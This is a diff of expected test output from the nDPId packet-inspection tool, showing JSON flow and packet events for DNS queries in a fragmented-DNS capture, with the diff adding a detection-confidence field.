-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042373843,"flow_last_seen":1559042373854,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1560869882430,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042374827,"flow_last_seen":1559042374838,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1560869882430,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00822{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042374827,"flow_last_seen":1559042374838,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}}
+00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042371783,"flow_last_seen":1559042371794,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1560869882430,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042372779,"flow_last_seen":1559042372791,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1560869882430,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042373843,"flow_last_seen":1559042373854,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1560869882430,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042374827,"flow_last_seen":1559042374838,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1560869882430,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869882430,"flow_last_seen":1560869882430,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1560869882430,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1560869882430,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":129,"pkt_l4_len":75,"ts_msec":1560869882430,"pkt":"CFsOoYNeAAwpfKTLht1gDk+bAEsRQCABBHAfCxawAgwp\/\/58pMsmBkcARwAAAAAAAAAAABERvnYANQBL7vOR3wEgAAEAAAAAAAEFc2lnb2sQdmVydGVpbHRlc3lzdGVtZQNuZXQAAAEAAQAAKRAAAAAAAAAMAAoACKFV23rIz7mH"}
-00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869882430,"flow_last_seen":1560869882430,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1560869882430,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigok.verteiltesysteme.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00811{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869882430,"flow_last_seen":1560869882430,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1560869882430,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigok.verteiltesysteme.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1560869882447,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":133,"pkt_l4_len":79,"ts_msec":1560869882447,"pkt":"AAwpfKTLCFsOoYNeht1gBk3UAE8RPCYGRwBHAAAAAAAAAAAAEREgAQRwHwsWsAIMKf\/+fKTLADW+dgBPmiKR34GgAAEAAQAAAAEFc2lnb2sQdmVydGVpbHRlc3lzdGVtZQNuZXQAAAEAAcAMAAEAAQAAADwABIZbTosAACkFrAAAAAAAAA=="}
-00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869882430,"flow_last_seen":1560869882447,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1560869882447,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigok.verteiltesysteme.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"134.91.78.139"}}
+00826{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869882430,"flow_last_seen":1560869882447,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1560869882447,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigok.verteiltesysteme.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"134.91.78.139"}}
 00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869886413,"flow_last_seen":1560869886413,"flow_idle_time":180000,"flow_min_l4_payload_len":69,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1560869886413,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1560869886413,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":131,"pkt_l4_len":77,"ts_msec":1560869886413,"pkt":"CFsOoYNeAAwpfKTLht1gDXJYAE0RQCABBHAfCxawAgwp\/\/58pMsmBkcARwAAAAAAAAAAABERzk4ANQBN7vX6xwEgAAEAAAAAAAEHc2lnZmFpbBB2ZXJ0ZWlsdGVzeXN0ZW1lA25ldAAAAQABAAApEAAAAAAAAAwACgAIYOOBSPgiBSs="}
-00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869886413,"flow_last_seen":1560869886413,"flow_idle_time":180000,"flow_min_l4_payload_len":69,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1560869886413,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigfail.verteiltesysteme.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00813{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869886413,"flow_last_seen":1560869886413,"flow_idle_time":180000,"flow_min_l4_payload_len":69,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1560869886413,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigfail.verteiltesysteme.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1560869886443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":108,"pkt_l4_len":54,"ts_msec":1560869886443,"pkt":"AAwpfKTLCFsOoYNeht1gB6MtADYRPCYGRwBHAAAAAAAAAAAAEREgAQRwHwsWsAIMKf\/+fKTLADXOTgA2KY36x4GCAAEAAAAAAAAHc2lnZmFpbBB2ZXJ0ZWlsdGVzeXN0ZW1lA25ldAAAAQAB"}
-00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869886413,"flow_last_seen":1560869886443,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1560869886443,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigfail.verteiltesysteme.net","num_queries":1,"num_answers":0,"reply_code":2,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00822{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869886413,"flow_last_seen":1560869886443,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1560869886443,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigfail.verteiltesysteme.net","num_queries":1,"num_answers":0,"reply_code":2,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869889796,"flow_last_seen":1560869889796,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1560869889796,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1560869889796,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":113,"pkt_l4_len":59,"ts_msec":1560869889796,"pkt":"CFsOoYNeAAwpfKTLht1gDB+KADsRQCABBHAfCxawAgwp\/\/58pMsmIAD+AAAAAAAAAAAAAAD+pWgANQA7UegG5AEgAAEAAAAAAAEHZm9ybWVsMQJkZQAAAQABAAApEAAAAAAAAAwACgAIf6ON2rCVwqA="}
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869889796,"flow_last_seen":1560869889796,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1560869889796,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"formel1.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869889796,"flow_last_seen":1560869889796,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1560869889796,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"formel1.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1560869889815,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":117,"pkt_l4_len":63,"ts_msec":1560869889815,"pkt":"AAwpfKTLCFsOoYNeht1gAAAAAD8ROyYgAP4AAAAAAAAAAAAAAP4gAQRwHwsWsAIMKf\/+fKTLADWlaAA\/kK8G5IGAAAEAAQAAAAEHZm9ybWVsMQJkZQAAAQABwAwAAQABAAAOEAAEVRnq\/QAAKRAAAAAAAAAA"}
-00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869889796,"flow_last_seen":1560869889815,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"formel1.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"85.25.234.253"}}
+00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869889796,"flow_last_seen":1560869889815,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"formel1.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"85.25.234.253"}}
 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869895045,"flow_last_seen":1560869895045,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1560869895045,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1560869895045,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":112,"pkt_l4_len":58,"ts_msec":1560869895045,"pkt":"CFsOoYNeAAwpfKTLht1gAPc5ADoRQCABBHAfCxawAgwp\/\/58pMsmIAD+AAAAAAAAAAAAAAD+tnUANQA6UeeM7AEgAAEAAAAAAAEGZXJmcG9wAmRlAAAcAAEAACkQAAAAAAAADAAKAAh2WSv8Ots3rg=="}
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869895045,"flow_last_seen":1560869895045,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1560869895045,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"erfpop.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869895045,"flow_last_seen":1560869895045,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1560869895045,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"erfpop.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00590{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1560869895070,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":156,"pkt_l4_len":102,"ts_msec":1560869895070,"pkt":"AAwpfKTLCFsOoYNeht1gAAAAAGYRPCYgAP4AAAAAAAAAAAAAAP4gAQRwHwsWsAIMKf\/+fKTLADW2dQBmf6uM7IGAAAEAAgAAAAEGZXJmcG9wAmRlAAAcAAHADAAcAAEAAAEsABAmBkcAADAAAAAAAABoGGKRwAwAHAABAAABLAAQJgZHAAAwAAAAAAAAaBhjkQAAKQIAAAAAAAAA"}
-00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869895045,"flow_last_seen":1560869895070,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1560869895070,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"erfpop.de","num_queries":1,"num_answers":3,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"38.6.71.0"}}
+00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869895045,"flow_last_seen":1560869895070,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1560869895070,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"erfpop.de","num_queries":1,"num_answers":3,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"38.6.71.0"}}
 00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869900222,"flow_last_seen":1560869900222,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1560869900222,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1560869900222,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":114,"pkt_l4_len":60,"ts_msec":1560869900222,"pkt":"CFsOoYNeAAwpfKTLht1gDZ0NADwRQCABBHAfCxawAgwp\/\/58pMsgAQRwdlsAAAAAAAAKJQBT2bEANQA8zxHCoAEgAAEAAAAAAAEId2ViZXJsYWICZGUAADAAAQAAKRAAAACAAAAMAAoACPFs5uYvfUZc"}
